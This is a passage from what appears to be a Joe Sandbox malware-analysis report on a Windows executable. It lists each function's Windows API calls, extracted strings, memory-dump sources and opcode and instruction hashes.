                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: 9eb6a809442b691c39b41738bdc2116deb8300bae4c8b0e2fa2e1d518566f073
                                          • Instruction ID: 4b28fd728442ca91ae1dd4d4f998c330036f3be39e3f6d7aab40df5f0eb50871
                                          • Opcode Fuzzy Hash: 9eb6a809442b691c39b41738bdc2116deb8300bae4c8b0e2fa2e1d518566f073
                                          • Instruction Fuzzy Hash: 685184B20087859BC724EB60D8859DFB7ECEF84301F00592EF285D3191EE34A688CB76
                                          Function 00E588B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E5896E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 7b3aa9fc84b4238619b8e7849585ff182dbd63d33fff5b28e83656c8e18dacdb
                                          • Instruction ID: 02791a2750a6d106792708babaf71e9fbeb85809ecf53072cd52f5d443bfca45
                                          • Opcode Fuzzy Hash: 7b3aa9fc84b4238619b8e7849585ff182dbd63d33fff5b28e83656c8e18dacdb
                                          • Instruction Fuzzy Hash: 8C51D430600304BFDF289F25CE85BA93BA5FB05356F605913FD15F62A1DF71A9888B91
                                          Function 00DD2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E0C547
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0C569
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E0C581
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E0C59F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E0C5C0
                                          • DestroyCursor.USER32(00000000), ref: 00E0C5CF
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E0C5EC
                                          • DestroyCursor.USER32(?), ref: 00E0C5FB
                                            • Part of subcall function 00E5A71E: DeleteObject.GDI32(00000000), ref: 00E5A757
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2975913752-0
                                          • Opcode ID: 92b889d576291007ff75c94dd4b962859610d181334bfe0dbaaeed176eedfcae
                                          • Instruction ID: 8000e558993e44ec5a91467cf66d80c9b88a962350afe0695709abe9fe7ab7cd
                                          • Opcode Fuzzy Hash: 92b889d576291007ff75c94dd4b962859610d181334bfe0dbaaeed176eedfcae
                                          • Instruction Fuzzy Hash: 1E516A74600205AFDB24DF25DC45FBA7BB5EB58351F21062AF942A72E0DBB0ED90DB60
                                          Function 00E28E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E28A84,00000B00,?,?), ref: 00E28E0C
                                          • RtlAllocateHeap.NTDLL(00000000,?,00E28A84), ref: 00E28E13
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E28A84,00000B00,?,?), ref: 00E28E28
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00E28A84,00000B00,?,?), ref: 00E28E30
                                          • DuplicateHandle.KERNEL32(00000000,?,00E28A84,00000B00,?,?), ref: 00E28E33
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E28A84,00000B00,?,?), ref: 00E28E43
                                          • GetCurrentProcess.KERNEL32(00E28A84,00000000,?,00E28A84,00000B00,?,?), ref: 00E28E4B
                                          • DuplicateHandle.KERNEL32(00000000,?,00E28A84,00000B00,?,?), ref: 00E28E4E
                                          • CreateThread.KERNEL32(00000000,00000000,00E28E74,00000000,00000000,00000000), ref: 00E28E68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                          • String ID:
                                          • API String ID: 1422014791-0
                                          • Opcode ID: 13ef743d8cc0f25ecbdda91cb38e02fdb6a6e1d8917b68fe955e4b5f725239ee
                                          • Instruction ID: c52fed47a9fcac5591553f2cffbe72775da6d176f3e313bf6095e2d1807e6295
                                          • Opcode Fuzzy Hash: 13ef743d8cc0f25ecbdda91cb38e02fdb6a6e1d8917b68fe955e4b5f725239ee
                                          • Instruction Fuzzy Hash: 8F01ACB5641704FFE610AB65DD49F5B3B6CEB89711F014421FA05EB1A2CA70D8048A20
                                          Function 00E49A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E27652: CLSIDFromProgID.COMBASE ref: 00E2766F
                                            • Part of subcall function 00E27652: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E2768A
                                            • Part of subcall function 00E27652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E2758C,80070057,?,?), ref: 00E27698
                                            • Part of subcall function 00E27652: CoTaskMemFree.COMBASE(00000000), ref: 00E276A8
                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00E49B1B
                                          • _memset.LIBCMT ref: 00E49B28
                                          • _memset.LIBCMT ref: 00E49C6B
                                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00E49C97
                                          • CoTaskMemFree.COMBASE(?), ref: 00E49CA2
                                          Strings
                                          • NULL Pointer assignment, xrefs: 00E49CF0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: e00a00ddc3ef0e9ba28be37784f916103c81919822fe6d0fd2623692905ea9d4
                                          • Instruction ID: 73816713d7a1425ce712b360dd6412b4d0fd824a92238ade57fb053916b97266
                                          • Opcode Fuzzy Hash: e00a00ddc3ef0e9ba28be37784f916103c81919822fe6d0fd2623692905ea9d4
                                          • Instruction Fuzzy Hash: B2911971D00229ABDF14DFA5EC85ADEBBB9EF08710F20415AF519B7241DB716A44CFA0
                                          Function 00E4EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E33E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E33EB6
                                            • Part of subcall function 00E33E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E33EC4
                                            • Part of subcall function 00E33E91: CloseHandle.KERNEL32(00000000), ref: 00E33F8E
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4ECB8
                                          • GetLastError.KERNEL32 ref: 00E4ECCB
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4ECFA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E4ED77
                                          • GetLastError.KERNEL32(00000000), ref: 00E4ED82
                                          • CloseHandle.KERNEL32(00000000), ref: 00E4EDB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 1125dd96d3a5def6796722c08b6b96c708b4560a2e28d60c20e438320a7fe806
                                          • Instruction ID: cc140f0e2933ab1455ed3e05a5a36bce7eb2288518f106c545595b81ccca03e4
                                          • Opcode Fuzzy Hash: 1125dd96d3a5def6796722c08b6b96c708b4560a2e28d60c20e438320a7fe806
                                          • Instruction Fuzzy Hash: 5141AB716002109FDB14EF24DCA5F6EB7A1EF80714F089459F942AB3D2DB75A808CBA6
                                          Function 00E33226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00E332C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 43062ca0af98608d425ac46a188802d416eace30cc36927f3fa828c6d9ed4215
                                          • Instruction ID: 015d6cfcf910c29c44f47fd6e1352feb2ae597312d2a53bf10f4160a4c1c7f48
                                          • Opcode Fuzzy Hash: 43062ca0af98608d425ac46a188802d416eace30cc36927f3fa828c6d9ed4215
                                          • Instruction Fuzzy Hash: 66113A3120874ABFE7056B64DC47CABBB9CDF19374F21102BF504B6191E7B15B8086B5
                                          Function 00E34534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E3454E
                                          • LoadStringW.USER32(00000000), ref: 00E34555
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E3456B
                                          • LoadStringW.USER32(00000000), ref: 00E34572
                                          • _wprintf.LIBCMT ref: 00E34598
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E345B6
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00E34593
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: c1ee96e7af0523f1261a39489e1cc512e1a71e9372bf117ad5e78af5a86227ae
                                          • Instruction ID: 64b5a6d048b1bd48192767c7564cd4ead24f1eb0954f483fec3648d49fd53912
                                          • Opcode Fuzzy Hash: c1ee96e7af0523f1261a39489e1cc512e1a71e9372bf117ad5e78af5a86227ae
                                          • Instruction Fuzzy Hash: 000121F2900308BFE711A7A59D89EE7766CD708301F0009A5FB49E2051EA749E898B70
                                          Function 00DD2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000), ref: 00DD2ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000,000000FF), ref: 00DD2B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000), ref: 00E0C46A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000), ref: 00E0C4D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 88bbf9f8241a129453894d2920f623a65f1f6fecd9d19e485b8fe7e080f2e0b2
                                          • Instruction ID: ece46025c05faa6ff08469bcdd405d5fce822cf491213ec3c3d74c5fc1cce30d
                                          • Opcode Fuzzy Hash: 88bbf9f8241a129453894d2920f623a65f1f6fecd9d19e485b8fe7e080f2e0b2
                                          • Instruction Fuzzy Hash: 07410A303047809EC7398B298C9CB7B7BA1FB65314F68A91BE197A67A0C675D885D730
                                          Function 00E37368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E3737F
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E373B6
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00E373D2
                                          • _memmove.LIBCMT ref: 00E37420
                                          • _memmove.LIBCMT ref: 00E3743D
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00E3744C
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E37461
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E37480
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: bc739734f14efc97ad81e9b40a6e3973a0e3f3563ba2bd9855e4f6ad19522249
                                          • Instruction ID: 0ba45e232aca09fa9d8ba4e0d391a1ae1a7ae2b1c91a618f3ee424ae69462753
                                          • Opcode Fuzzy Hash: bc739734f14efc97ad81e9b40a6e3973a0e3f3563ba2bd9855e4f6ad19522249
                                          • Instruction Fuzzy Hash: 60318D75904205EFCF10DF65DC89AAA7BB8EF44311F1581A5FA04AB256DB309A14CBB0
                                          Function 00E56442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00E5645A
                                          • GetDC.USER32(00000000), ref: 00E56462
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E5646D
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E56479
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E564B5
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E564C6
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E59299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E56500
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E56520
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 83ede58a5c72737cf40421decc649108415df15c1273859a811a5454c8de0b14
                                          • Instruction ID: fff51352ff2ff1fff611df3a3b4444e5c4c006e9de1952beefd88537604618f6
                                          • Opcode Fuzzy Hash: 83ede58a5c72737cf40421decc649108415df15c1273859a811a5454c8de0b14
                                          • Instruction Fuzzy Hash: 9C319F72201210BFEF148F51CC4AFEB3FA9EF09766F040465FE08AA191D6B59C45CBA0
                                          Function 00E2C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 1cad31fe80c818bb72196cf985132efd8854b097709bbc8a44cefe45d2ce9d48
                                          • Instruction ID: 6d6da5d14cecf2198606bfc33c627649de01a4fb90f392874771c3fdcba62ef9
                                          • Opcode Fuzzy Hash: 1cad31fe80c818bb72196cf985132efd8854b097709bbc8a44cefe45d2ce9d48
                                          • Instruction Fuzzy Hash: 2621C565681629B7D214B521FC42FBF33ACEF207D9B286024FF05B62C2E751DD2181B6
                                          Function 00DD1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a3e7c67dc8019c0967fbf2a252da68c4d5f3b755ee0976b2d73331b87ec3504
                                          • Instruction ID: 73111f47fd085c59e49b765933b5bbefb73867bdb27583af6bbcf17677a3b853
                                          • Opcode Fuzzy Hash: 5a3e7c67dc8019c0967fbf2a252da68c4d5f3b755ee0976b2d73331b87ec3504
                                          • Instruction Fuzzy Hash: 7B716834900109FFCB149F99CC89ABEBB79FF85314F14815AF915AB291C734AA55CBB0
                                          Function 00E5B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(00F72230), ref: 00E5B6A5
                                          • IsWindowEnabled.USER32(00F72230), ref: 00E5B6B1
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E5B795
                                          • SendMessageW.USER32(00F72230,000000B0,?,?), ref: 00E5B7CC
                                          • IsDlgButtonChecked.USER32(?,?), ref: 00E5B809
                                          • GetWindowLongW.USER32(00F72230,000000EC), ref: 00E5B82B
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E5B843
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
